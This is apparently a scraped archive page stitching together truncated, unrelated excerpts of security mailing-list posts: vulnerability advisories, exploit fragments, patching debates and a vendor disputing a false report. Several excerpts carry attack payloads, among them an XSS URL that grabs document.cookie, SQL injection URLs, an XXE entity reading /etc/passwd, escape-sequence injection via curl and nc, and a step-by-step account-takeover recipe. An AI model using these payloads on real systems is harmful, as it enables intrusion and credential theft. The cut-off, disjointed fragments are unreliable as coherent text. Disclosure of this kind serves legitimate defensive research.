
Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities

  I - IP SPOOFING

  The file "scripts/sb_communicate.php" contains the following
  code: 

  function getIP() {
    if ( !empty ( $_SERVER[ 'HTTP_CLIENT_IP' ] ) ) {
      $ip = $_SERVER[ 'HTTP_CLIENT_IP' ];
    }
    else if ( !empty ( $_SERVER[ 'HTTP_X_FORWARDED_FOR' ] ) ) {
      $ip = $_SERVER[ 'HTTP_X_FORWARDED_FOR' ];

Multiple vulnerabilities in SiT! Support Incident Tracker

Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ ) 

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform SQL injection, cross-site scripting and cross-site request forgery attacks.

1) Input passed via the "start" GET parameter to /portal/kb.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC code is available:

http://[host]/portal/kb.php?start=SQL_CODE_HERE

[Advisory] Invision Power Board <= 2.3.5 Multiple Vulnerabilities and Security Bypass

  user's inputs are handled. All superglobal arrays which
  can be partially modified by the user, are passed to the 
  function "parse_clean_globals()". Let's see the content
  of the file "sources/ipsclass.php":

  $this->clean_globals( $_GET );
  $this->clean_globals( $_POST );
  $this->clean_globals( $_COOKIE );
  $this->clean_globals( $_REQUEST );

  This function will replace special characters such as

(TAD-2011-001) Vulnerability in HTC Peep: Twitter Credentials Disclosure

-- Vulnerability description: 

The default Twitter client (or application) in HTC mobile devices is called HTC Peep. HTC Peep is vulnerable to two different credentials disclosure vulnerabilities during the authentication process against the Twitter service (twitter.com).

During the authentication process, the HTC Peep app establishes an HTTP (TCP/80) connection against the twitter.com servers, sending a few HTTP OAuth-related requests. The first two HTTP GET requests try to gather and make use of an OAuth token: "GET /oauth/request_token" (the response contains the "oauth_token") and "GET /oauth/authorize?oauth_token=...". 

The first vulnerability resides in the third HTTP request, a POST request towards the "/oauth/authorize" resource, which contains several parameters, including the Twitter username and password in the clear, making the authentication process vulnerable to eavesdropping attacks:

authenticity_token=c8b5abaf53f223e827d9258ddfef4285a816db5f&
oauth_token=I4FK956n1foaHjayLKXJT2IaBpsmoo0amKyPhebc&

HTB23005: Multiple XSS in N-13 News

Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) 

Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in N-13 News, which can be exploited to perform cross-site scripting attacks.

1) Input passed via the GET "id" parameter to index.php is not properly sanitised before being returned to the user. 
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.

The following PoC code is available:

http://[host]/index.php?id=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

Multiple vulnerabilities in ircu

some time ago, which have all been fixed for some time (since 2.10.12.06)
but not yet made public. Now that servers have had enough time to upgrade,
I feel it's time to do so.
None of these bugs can be abused for arbitrary code execution. Two are about
crashing a server, one about exposing IP addresses, and the effect of the
others stays within IRC: they allow clients to get more privileges on the IRC
network than they are supposed to have.

Overview
========
Affecting only 2.10.12.01:

[Exploit] Invision Power Board <= 2.3.5 Multiple Vulnerabilities

        function main()
        {
                $this->mhead();
                
                # Gimme your args
                $this->p_attack = $this->get_p('attack', true);
                $this->p_prox   = $this->get_p('proxhost');
                $this->p_proxa  = $this->get_p('proxauth');
                
                $this->init_global();
                

Remote Memory Read in Diskeeper 9 - 2007

Diskeeper is of minimal consequence, this write-up will focus on 
the memory reading aspect.

By making use of shared user memory at 0x7FFE0000, an attacker can 
learn information, such as Windows drive, path, and version.  More 
importantly for a targeted attack, an attacker can also get the 
name, path, version and base address of all loaded modules in the 
process.  This would essentially defeat address space randomization
(ASLR) in Windows Vista, since loaded modules tend to have the same 
preferred address in all processes for each boot of the system.


SQL Injection and XSS vulnerabilities in CubeCart version 4.3.3

SQL query:
SELECT id FROM cube_CubeCart_search WHERE searchstr='''

Sample HTTP Request:
GET /cubecart_4/index.php?_a=viewCat&searchStr='&Submit=Go HTTP/1.1
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;
ccUser=7c970bfe00c50261d25166dbab43c294
Host: webapps7:80

Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa log escape sequence injection

One of the following two Proofs Of Concept can be used in order to
verify the vulnerability.

curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a

echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload

B) "Varnish" log escape sequence injection

One of the following two Proofs Of Concept can be used in order to

Re: Summary of AS/400 Vulnerability Information

7) Known vulnerabilities:

CVE ID          Disclosed       Title
CVE-2000-1038   12/11/2000      The web administration interface for IBM AS/400 Firewall allows remote attackers to cause a denial of service via an empty GET request.
CVE-2002-1731   12/31/2002      The System Request menu in IBM AS/400 allows local users to list valid user accounts by viewing the object names that are type USRPRF.
CVE-2005-0868   05/02/2005      AS/400 Telnet 5250 terminal emulation clients, as implemented by (1) IBM client access, (2) Bosanova, (3) PowerTerm,

two bytehoard 2.1 bugs

Exploit (1)

Log into bytehoard using a non privileged user.
Perform any desired actions, then log out.
Click on the "Lost Details" link.
Input the desired username you want to have access to ("admin" to get 
administrator access) and submit the data.
The system will either return an error message or a "mail sent" message.
Ignore the last message and go directly to the index.php page (easily 
obtained by erasing the "?page=passreset" part)
You should have access to the desired account.

[DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS

Details 
******* 
Using the discovered vulnerabilities, an attacker can intercept a user's cookie and perform any administrative actions in the system on that user's behalf. 

1. Cross-site scripting vulnerability found in script aa-add-analytic2.jsp 
Vulnerable GET parameter "backURL"
2. Cross-site scripting vulnerability found in script aa-add-validate.jsp 
Vulnerable GET parameter "pagePos" 
3. Cross-site scripting vulnerability found in script aa-analytic-frameset.jsp.jsp 
Vulnerable GET parameter "entry" 
4. Cross-site scripting vulnerability found in script aa-cacheparams.jsp 

Re: [Full-disclosure] 3rd party patch for XP for MS09-048?

>>> new
>>> here... :/ As Larry and Thor pointed out, what sux is that despite M$
>>> "PROMISING" that they would continue supporting XP since they didn't 
>>> exactly
>>> state WHAT they would support, they seem to be legally free to 
>>> actually get
>>> away with this BS *sigh* gotta love insurance-salesman-tactics when 
>>> it comes
>>> to promises...
>>>
>>> So... with all this commentary, in the end, I still didn't read from 

RE: [Full-disclosure] 3rd party patch for XP for MS09-048?

b) M$ is trying to boost Win7 sales... Whoopdee-@#$%#^-doo... As was stated
earlier, they did the exact same thing back in Win2K days... Nothing new
here... :/ As Larry and Thor pointed out, what sux is that despite M$
"PROMISING" that they would continue supporting XP since they didn't exactly
state WHAT they would support, they seem to be legally free to actually get
away with this BS *sigh* gotta love insurance-salesman-tactics when it comes
to promises...

So... with all this commentary, in the end, I still didn't read from the
"big'uns" on whether or not a 3rd party open-source patch would be

Invision Power Board <= 3.0.4 Local PHP File Inclusion and SQL Injection

line | file: admin/sources/base/ipsRegistry.php
352  | static public function init()
353  | {
...  |
...  |
462  | IPSLib::cleanGlobals( $_GET );
463  | IPSLib::cleanGlobals( $_POST );
464  | IPSLib::cleanGlobals( $_COOKIE );
465  | IPSLib::cleanGlobals( $_REQUEST );
466  |
467  | # GET first

Re: [Full-disclosure] 3rd party patch for XP for MS09-048?

>
> b) M$ is trying to boost Win7 sales... Whoopdee-@#$%#^-doo... As was stated
> earlier, they did the exact same thing back in Win2K days... Nothing new
> here... :/ As Larry and Thor pointed out, what sux is that despite M$
> "PROMISING" that they would continue supporting XP since they didn't exactly
> state WHAT they would support, they seem to be legally free to actually get
> away with this BS *sigh* gotta love insurance-salesman-tactics when it comes
> to promises...
>
> So... with all this commentary, in the end, I still didn't read from the
> "big'uns" on whether or not a 3rd party open-source patch would be

Top 5-ish Threats to Watch for in 2009


1. This continuing trend to invest in the constant reminders of
assumed security best practices screamed at all levels and types of
workers across the work site will continue to eat away budgets,
prevent security professionals from actually enhancing security and
distract employees from working. This includes policy tidbits and
factoids for employees to see everywhere from posters in the bathroom
to mouse pad messages on their desks to screensaver quizzes they need
to answer prior to login.  Even organizations that eschew formal

RE: [Full-disclosure] 3rd party patch for XP for MS09-048?

Yes, they used the bulletin to soft-pedal the description, but at the
same time I think they send a message about XP users being on shaky
ground. Just because they've got 4+ years of Extended Support Period
left doesn't mean they're going to get first-class treatment.

Larry Seltzer
Contributing Editor, PC Magazine
larry_seltzer@ziffdavis.com 
http://blogs.pcmag.com/securitywatch/


Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">
  <body>
    <object type="flex.messaging.messages.CommandMessage">
      <traits>
        <string>body</string><string>clientId</string><string>correlationId</string>
        <string>destination</string><string>headers</string><string>messageId</string>
        <string>operation</string><string>timestamp</string><string>timeToLive</string>
      </traits><object><traits />
      </object>

CORE-2009-0803: Virtual PC Hypervisor Memory Protection Vulnerability

            w = TRUE;
          }
          /* if readable or writeable */
          if ( r == TRUE || w == TRUE )
          {
            /* get contents into our buffer */
            memcpy ( buffer , base , 0x1000 );

            /* print page attributes */
            printf ( "attributes: " );
            printf ( "%s" , ( r == TRUE ) ? "R":"" );

Wrong report: BID 32287, Pi3Web ISAPI DoS vulnerability

Please remove this wrong report (no crash happens as reported, and Pi3Web version 2.013 doesn't exist at all!!!) and inform all sites copying information from your site about the removal.

I am very disappointed about the fact that such reports are published without contacting software vendors or any attempt at verification/reproduction of the reported issues. 

Unfortunately the published reports are copied by the whole "internet security community" within days (google for "Pi3Web ISAPI DoS vulnerability"). But a correction of a once-reported issue is never copied. As representative of a small open source project without budget, I can only contact a handful of security sites in order to comment on a wrong report.

But I can never repair the image demolition resulting from such false reports.

Therefore I will close the open source project Pi3Web for that reason, because wrong reports have happened multiple times in the past.


"Exploit creation - The random approach" or "Playing with random to build exploits"

Sunday, September 21, 2008
By Nelson Brito <nbrito@sekure.org>

-[ Introduction

It is just a matter of time before things get worse on the Internet. We saw
worms getting more and more sophisticated in the last decade, and, believe me,
it could be worse. Nowadays we have botnets and a lot of worms and their
respective variants, but what if a stealth worm reaches the Internet today?
Are we prepared to deal with this kind of threat? Are we walking in the right
direction to get this kind of threat controlled in a short period of time?

Multiple Vulnerabilities in OpenClassifieds 1.7.0.3

or default urls:
"powered by Open Classifieds"  inurl:"item-new.php" (16,500 results)
Total sites: ~100,000

The target must be a link to the document root of OpenClassifieds
(If the exploit doesn't immediately reload then blind sqli is required, which will take a few minutes ;)
<form>
        Target:&nbsp;&nbsp;<input size=128 name=target value="http://localhost/"><br>
        Payload:<input size=128 name=xss value="<script>alert('xss')</script>"><br>
        <input type=submit value="Attack">

Jetty 6.x and 7.x Multiple Vulnerabilities

By requesting the demo "Dump Servlet" at a URL like "/test/dump/"
it's possible to obtain a number of details about the remote Jetty
instance.

Variables: getMethod, getContentLength, getContentType, getRequestURI,
getRequestURL, getContextPath, getServletPath, getPathInfo,
getPathTranslated, getQueryString, getProtocol, getScheme,
getServerName, getServerPort, getLocalName, getLocalAddr,
getLocalPort, getRemoteUser, getRemoteAddr, getRemoteHost,
getRemotePort, getRequestedSessionId, isSecure(), isUserInRole(admin),

Re: [Full-disclosure] 3rd party patch for XP for MS09-048?

bulletin)

Thor (Hammer of God) wrote:
> Yeah, I know what it is and what it's for ;)  That was just my subtle way of trying to make a point.  To be more explicit:
>
> 1)  If you are publishing a vulnerability for which there is no patch, and for which you have no intention of making a patch for, don't tell me it's mitigated by ancient, unusable default firewall settings, and don't withhold explicit details.  Say "THERE WILL BE NO PATCH, EVER.  HERE'S EVERYTHING WE KNOW SO YOU CAN DETERMINE YOUR OWN RISK."  Also, don't say 'you can deploy firewall settings via group policy to mitigate exposure' when the firewall obviously must be accepting network connections to get the settings in the first place. If all it takes is any listening service, then you have issues.  It's like telling me that "the solution is to take the letter 'f' out of the word "solution."
>
> 2)  Think things through.  If you are going to try to boost sales of Win7 to corporate customers by providing free XP VM technology and thus play up how important XP is and how many companies still depend upon it for business critical application compatibility, don't deploy that technology in an other-than-default configuration that is subject to a DoS exploit while downplaying the extent that the exploit may be leveraged by saying that a "typical" default configuration mitigates it while choosing not to ever patch it.    Seems like simple logic points to me.
>
> t
>

RE: [Full-disclosure] 3rd party patch for XP for MS09-048?

Yeah, I know what it is and what it's for ;)  That was just my subtle way of trying to make a point.  To be more explicit:

1)  If you are publishing a vulnerability for which there is no patch, and for which you have no intention of making a patch for, don't tell me it's mitigated by ancient, unusable default firewall settings, and don't withhold explicit details.  Say "THERE WILL BE NO PATCH, EVER.  HERE'S EVERYTHING WE KNOW SO YOU CAN DETERMINE YOUR OWN RISK."  Also, don't say 'you can deploy firewall settings via group policy to mitigate exposure' when the firewall obviously must be accepting network connections to get the settings in the first place. If all it takes is any listening service, then you have issues.  It's like telling me that "the solution is to take the letter 'f' out of the word "solution."

2)  Think things through.  If you are going to try to boost sales of Win7 to corporate customers by providing free XP VM technology and thus play up how important XP is and how many companies still depend upon it for business critical application compatibility, don't deploy that technology in an other-than-default configuration that is subject to a DoS exploit while downplaying the extent that the exploit may be leveraged by saying that a "typical" default configuration mitigates it while choosing not to ever patch it.    Seems like simple logic points to me.

t

> -----Original Message-----
> From: Susan Bradley [mailto:sbradcpa@pacbell.net]

Black Hat November News: CFPS Now Open, Webinar 5 and Japan on-line.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Hello Bug Traq Readers, here are some updates on upcoming Black Hat
briefings as well as ways to get involved.

BLACK HAT FREE WEBINAR Nov 20th
https://www.blackhat.com/html/webinars/clickjacking.html

Black Hat Webcast #5 is scheduled for Thursday, November 20 at 1pm PST.  

Re: Re: Wrong report: BID 32287, Pi3Web ISAPI DoS vulnerability

Still wrong, No DoS. The server responds to further requests, after the dialog box appears:
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:17:51 +0100] "GET /isapi/users.txt HTTP/1.1" 500 339
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:17:51 +0100] "GET /favicon.ico HTTP/1.1" 200 973
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET / HTTP/1.1" 200 2559
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Web_earth3.gif HTTP/1.1" 200 3811
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Web.ico HTTP/1.1" 200 973
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/red_ball.gif HTTP/1.1" 200 397
192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Tile.gif HTTP/1.1" 200 1866


Copyright © 1995-2012 LinuxRocket.net. All rights reserved.